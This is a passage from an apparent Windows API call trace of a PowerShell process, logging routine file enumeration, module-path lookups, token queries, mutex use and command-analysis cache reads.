ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0168.630] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0168.630] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0168.630] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0168.630] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0168.631] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0168.631] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0168.631] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0168.631] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8cfe0 | out: lpFindFileData=0xb156f8cfe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0168.652] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0168.656] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0168.658] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0168.683] CoTaskMemAlloc (cb=0x20e) returned 0x1e351452170 [0168.683] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e351452170, nSize=0x105 | out: lpBuffer="") returned 0x0 [0168.683] CoTaskMemFree (pv=0x1e351452170) [0168.689] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144ec50 [0168.689] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144ec50, nSize=0x105 | out: lpBuffer="") returned 0x0 [0168.689] CoTaskMemFree (pv=0x1e35144ec50) [0168.702] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144f090 [0168.702] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144f090 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0168.702] CoTaskMemFree (pv=0x1e35144f090) [0168.702] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0168.703] GetCurrentProcess () returned 0xffffffffffffffff [0168.703] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d318 | out: TokenHandle=0xb156f8d318*=0x458) returned 1 [0168.703] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8d418 | out: TokenInformation=0x0, ReturnLength=0xb156f8d418) returned 0 [0168.703] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d59d0 [0168.703] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x1, TokenInformation=0x1e3513d59d0, TokenInformationLength=0x2c, ReturnLength=0xb156f8d418 | out: TokenInformation=0x1e3513d59d0, ReturnLength=0xb156f8d418) returned 1 [0168.704] LocalFree (hMem=0x1e3513d59d0) returned 0x0 [0168.705] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e33989b6e0, cbSid=0xb156f8d410 | out: pSid=0x1e33989b6e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8d410) returned 1 [0168.705] CreateMutexW (lpMutexAttributes=0x1e33989b830, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x35c [0168.708] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d2b0*=0x35c, lpdwindex=0xb156f8d084 | out: lpdwindex=0xb156f8d084) returned 0x0 [0168.708] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144f910 [0168.708] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144f910, nSize=0x105 | out: lpBuffer="") returned 0x0 [0168.709] CoTaskMemFree (pv=0x1e35144f910) [0168.709] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0xb156f8cf70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0168.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d400) returned 1 [0168.709] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e33989bed0 | out: lpFileInformation=0x1e33989bed0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1 [0168.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3c0) returned 1 [0168.709] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0168.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d2f0) returned 1 [0168.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d3d0 | out: lpFileInformation=0xb156f8d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0168.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d2b0) returned 1 [0168.709] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_cc38888a-7080-4220-9b7d-de7a9b2167ba", nBufferLength=0x105, lpBuffer=0xb156f8cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_cc38888a-7080-4220-9b7d-de7a9b2167ba", lpFilePart=0x0) returned 0x93 [0168.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d230) returned 1 [0168.710] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_cc38888a-7080-4220-9b7d-de7a9b2167ba" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_cc38888a-7080-4220-9b7d-de7a9b2167ba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0168.710] GetFileType (hFile=0x45c) returned 0x1 [0168.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d1a0) returned 1 [0168.710] GetFileType (hFile=0x45c) returned 0x1 [0168.710] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33989d1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d098, lpOverlapped=0x0 | out: lpBuffer=0x1e33989d1d0*, lpNumberOfBytesRead=0xb156f8d098*=0x717, lpOverlapped=0x0) returned 1 [0168.714] ReadFile (in: hFile=0x45c, lpBuffer=0x1e33989d1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d068, lpOverlapped=0x0 | out: lpBuffer=0x1e33989d1d0*, lpNumberOfBytesRead=0xb156f8d068*=0x0, lpOverlapped=0x0) returned 1 [0168.714] CloseHandle (hObject=0x45c) returned 1 [0168.714] ReleaseMutex (hMutex=0x35c) returned 1 [0168.714] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d0e0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0168.714] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514516d0 [0168.714] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e3514516d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0168.714] CoTaskMemFree (pv=0x1e3514516d0) [0168.714] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144bfb0 [0168.714] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144bfb0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0168.714] CoTaskMemFree (pv=0x1e35144bfb0) [0168.714] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0168.715] GetCurrentProcess () returned 0xffffffffffffffff [0168.715] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d318 | out: TokenHandle=0xb156f8d318*=0x45c) returned 1 [0168.715] GetTokenInformation (in: TokenHandle=0x45c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8d418 | out: TokenInformation=0x0, ReturnLength=0xb156f8d418) returned 0 [0168.715] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d59d0 [0168.715] GetTokenInformation (in: TokenHandle=0x45c, TokenInformationClass=0x1, TokenInformation=0x1e3513d59d0, TokenInformationLength=0x2c, ReturnLength=0xb156f8d418 | out: TokenInformation=0x1e3513d59d0, ReturnLength=0xb156f8d418) returned 1 [0168.716] LocalFree (hMem=0x1e3513d59d0) returned 0x0 [0168.716] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e3398a21a8, cbSid=0xb156f8d410 | out: pSid=0x1e3398a21a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8d410) returned 1 [0168.716] CreateMutexW (lpMutexAttributes=0x1e3398a22f8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x730 [0168.716] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d2b0*=0x730, lpdwindex=0xb156f8d084 | out: lpdwindex=0xb156f8d084) returned 0x0 [0168.717] CoTaskMemAlloc (cb=0x20e) returned 0x1e351451290 [0168.717] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e351451290, nSize=0x105 | out: lpBuffer="") returned 0x0 [0168.717] CoTaskMemFree (pv=0x1e351451290) [0168.717] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0xb156f8cf70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0168.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d400) returned 1 [0168.717] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e3398a29a0 | out: lpFileInformation=0x1e3398a29a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0168.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3c0) returned 1 [0168.717] ReleaseMutex (hMutex=0x730) returned 1 [0168.717] CoCreateGuid (in: pguid=0xb156f8d428 | out: pguid=0xb156f8d428*(Data1=0x123095fa, Data2=0x87be, Data3=0x4863, Data4=([0]=0x80, [1]=0x8f, [2]=0x1d, [3]=0xe7, [4]=0xf8, [5]=0x48, [6]=0x3a, [7]=0x25))) returned 0x0 [0168.718] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x784 [0168.718] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x78c [0168.718] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x790 [0168.718] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x734 [0168.718] SetEvent (hEvent=0x734) returned 1 [0168.718] SetEvent (hEvent=0x784) returned 1 [0168.718] SetEvent (hEvent=0x78c) returned 1 [0168.718] SetEvent (hEvent=0x790) returned 1 [0168.718] AmsiCloseSession () returned 0x7ffbe18d8068 [0168.718] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x794 [0168.719] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.795] EtwEventActivityIdControl () returned 0x0 [0168.795] EtwEventActivityIdControl () returned 0x0 [0168.795] EtwEventActivityIdControl () returned 0x0 [0168.945] CoTaskMemAlloc (cb=0x20e) returned 0x1e351451070 [0168.945] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e351451070, nSize=0x105 | out: lpBuffer="") returned 0x97 [0168.945] CoTaskMemFree (pv=0x1e351451070) [0168.945] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0168.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0168.946] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0168.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0168.948] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0168.957] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0168.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0168.957] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0168.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0168.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0168.957] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0168.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0168.957] CoTaskMemAlloc (cb=0x20e) returned 0x1e351450c30 [0168.957] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e351450c30, nSize=0x105 | out: lpBuffer="") returned 0x97 [0168.957] CoTaskMemFree (pv=0x1e351450c30) [0168.957] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0168.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0168.958] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0168.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0168.960] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0168.968] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0168.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0168.968] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0168.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0168.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0168.968] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0168.968] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0168.969] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c940) returned 1 [0168.969] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c420, lpFilePart=0x0 | out: lpBuffer="C:\\Program 